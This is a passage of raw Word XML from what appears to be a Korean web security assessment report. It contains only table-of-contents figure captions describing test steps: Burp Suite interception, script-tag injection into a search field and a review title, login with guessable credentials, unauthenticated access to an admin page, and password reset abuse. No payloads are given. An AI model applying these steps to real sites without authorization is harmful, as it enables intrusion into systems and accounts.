          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58F96D3D" w14:textId="4E15D7E8" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094599" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 26. Burp Suite -&gt; Intercept on 후, 검색어 입력</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094599 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73E09A4B" w14:textId="639058FE" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094600" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 27. 검색어가 삽입된 부분 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094600 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A8C26FC" w14:textId="756A6CB9" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094601" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 28. 삽입되는 부분을 우회하기 위한 공격 구문 삽입</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094601 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DC04F37" w14:textId="5A1BB54D" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094602" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 29. 스크립트 태그 작동 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094602 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15ABB744" w14:textId="54A5887F" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094603" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 30. 메인에서 상품 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094603 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77A26DB6" w14:textId="556D0367" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094604" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 31. 상품 설명 하단 “상품평”에서 “WRITE” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094604 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D57E04C" w14:textId="75826D4C" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094605" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 32. 제목에 점검용 HTML 스크립트 태그 삽입</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094605 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F447CC8" w14:textId="6F926C3A" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094606" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 33. 점검용 스크립트 태그 구동 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094606 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2173CED6" w14:textId="6D317ECE" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094607" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 34. 메인에서 “로그인” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094607 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72D2BAD6" w14:textId="41B00859" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094608" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 35. 추측할 수 있는 계정 조합으로 로그인 시도</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094608 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19568E71" w14:textId="56D54D2A" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094609" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 36. 정상적인 로그인 확인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094609 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28A351B4" w14:textId="65FD3269" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094610" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 37. 로그인하지 않은 상태의 메인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094610 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C823944" w14:textId="07066312" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094611" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 38. 관리자 페이지의 회원 관리 페이지 접근 시도</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094611 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4ADB9522" w14:textId="4FF59EDC" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094612" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 39. 인증 없이 접근 가능</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094612 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64F5125D" w14:textId="46C72BD9" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094613" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 40. 로그인하지 않은 상태의 메인</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094613 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28CE71E6" w14:textId="6A285079" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094614" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 41. 로그인 페이지에서 “비밀번호 재설정” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094614 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12F43E8D" w14:textId="5C25FA1D" w:rsidR="00B9713E" w:rsidRDefault="0041664A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc209094615" w:history="1">
        <w:r w:rsidR="00B9713E" w:rsidRPr="00283526">
          <w:rPr>
            <w:rStyle w:val="ab"/>
          </w:rPr>
          <w:t>[그림] 42. guest에 대한 정보 입력 후 “비밀번호 재설정” 클릭</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc209094615 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r w:rsidR="00B9713E">
          <w:rPr>
            <w:webHidden/>
